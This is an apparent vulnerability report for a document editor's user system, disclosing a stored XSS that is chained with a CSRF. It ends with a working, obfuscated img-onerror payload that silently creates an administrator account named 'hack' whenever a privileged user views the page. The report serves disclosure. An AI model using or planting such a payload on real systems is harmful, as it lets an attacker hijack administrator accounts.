Open
Description
Hello, I found two vulnerabilities: a stored XSS and a CSRF.
Attacker can exploit the vulnerability to execute malicious javascript on a document page and hijack the identity of other users (normal users or administrators).
XSS
The document editor does not filter or block the execution of Javascript, resulting in stored XSS. Any user browsing the document containing XSS malicious code will trigger the vulnerability.
CSRF
Using the XSS vulnerability from the previous step, attacker can hijack the identity of other users. I recorded a GIF to demonstrate a normal user hijacking the super administrator's identity to create a new administrator account.
Payload
<img src=# onerror='eval(decodeURI("var%20a%20=%20window.XMLHttpRequest%20?%20new%20XMLHttpRequest()%20:%20new%20ActiveXObject(%22Microsoft.XMLHTTP%22);a.open(%22POST%22,%22/system/user/save%22,false);a.setRequestHeader(%22Content-type%22,%22application/x-www-form-urlencoded%22);a.send(%22username=hack&given_name=hack&password=hack&email=1%25401.cn&mobile=18888888888&role_id=1&phone=&department=&position=&location=&im=%22);"))'>